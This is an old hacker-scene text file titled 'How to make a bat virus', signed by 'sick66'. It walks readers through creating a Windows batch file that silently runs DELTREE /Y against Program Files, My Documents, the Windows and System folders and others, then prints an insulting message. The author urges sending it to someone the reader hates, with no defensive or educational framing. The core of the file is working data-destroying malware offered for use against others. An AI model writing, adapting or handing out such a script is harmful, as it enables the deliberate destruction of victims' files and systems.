              |                                        x  
 cRaZy    /          /  |    /          /        /     x  
 TeXt    /    |     /   |   /          /        /      x  
 FiLe   /     |    /    |  /          /        /       x  
  By:  /      |   /     | /          /        /        x
      /_____  |  /      |/          /        /         x
           /  |  \      |\         /        /          x
 00/01    /   |   \     | \       /______  /______     x
         /    |    \    |  \     /      / /      /     x
        /     |     \   |   \   /   ?  / /   ?  /      x
       /      |      \  |    \ /______/ /______/       x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
H O W  T O  M A K E  A  B A T   V I R U S              X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
disclaimer: fuck the disclaimer, just remember that    x
a bat virus CAN DESTROY SOMEONES COMPUTER!!            x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
send this bat virus to some lamer you hate!!           x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
W H A T  D O N' T  N E E D                             x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                                                       x
- programming experience                               x
- hacking skills                                       x                            
- programming utilities                                x
                                                       x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
W H A T  Y O U    N E E D                              x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                                                       x
- notepad (not so hard, hey?)                          x
- a target                                             x
                                                       x
yes, it's that easy... here we go                      x
                                                       x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
F O L L O W  T H E S E  S T E P S                      x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

- right click with your mouse on the desktop
- select 'new'
- then you will see a list of files you can create, pick 'textfile'
- now, name it 'funny' or something (without the ' ')
- the put the following code:

xxxxxxxxxxxxxxxxx C U T  H E R E xxxxxxxxxxxxxxxxxxxxxxx

@ECHO OFF
IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.* 
IF EXIST C:\MY DOCUMENTS\*.* DELTREE /Y C:\MY DOCUMENTS\*.* 
IF EXIST C:\WINDOWS\DESKTOP\*.* DELTREE /Y C:\WINDOWS\DESKTOP\*.* 
IF EXIST C:\WINDOWS\START MENU\*.* DELTREE /Y C:\WINDOWS\START MENU\*.* 
IF EXIST C:\WINDOWS\COMMAND\*.* DELTREE /Y C:\WINDOWS\COMMAND\*.* 
IF EXIST C:\WINDOWS\SYSTEM\*.* DELTREE /Y C:\WINDOWS\SYSTEM\*.* 
IF EXIST C:\WINDOWS\*.* DELTREE /Y C:\WINDOWS\*.* 
ECHO                    *********************** :-P
ECHO                   YOU HAVE BEEN HIT BY THE HARD-DRIVE KILLA!
ECHO                   BY THE WAY.....YOUR COMPUTER IS REALLY FUCKED UP NOW..DUDE!
ECHO                   NASTY...HEY?!  IF YOU GOT THIS VIRUS...YOU DESERVED IT, MOTHER-BUT-FUCK!
ECHO                    *********************** :-P
ECHO                   COPYRIGHT SICK66 00/01

xxxxxxxxxxxxxxxxx C U T  H E R E xxxxxxxxxxxxxxxxxxxxxxxx

notes: - if you put in the code...do it without the 'cut here' line!
       - if you don't want to type it all again just select the code an hit
         'control-c' (ctrl+c) and place your cursor in your new created file
         and hit control-v (ctrl+v)
       - when all that is done, select 'save as' and save it as funny.bat
       - (IT MUST END IN .BAT OR ELSE IT WON'T WORK!!!!!!!!!!!!!!)

   AS SIMPLE AS THAT...EVEN THE BIGGEST SUCKER CAN DO THIS...RIGHT??

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        H O W  T O  C O N T A C T  M E:                   x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

if you have any questions concerning my textfiles:

    my e-mail: sick66@chatplaza.nl
    my icq# : 77293314
    my phone number: fuck you man! :-p

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

ps: you can also send me a mail about virusses and hacking
cuz i'm also into that shit

         tot ziens (that is dutch for goodbye)

         -=*sick66*=-
            












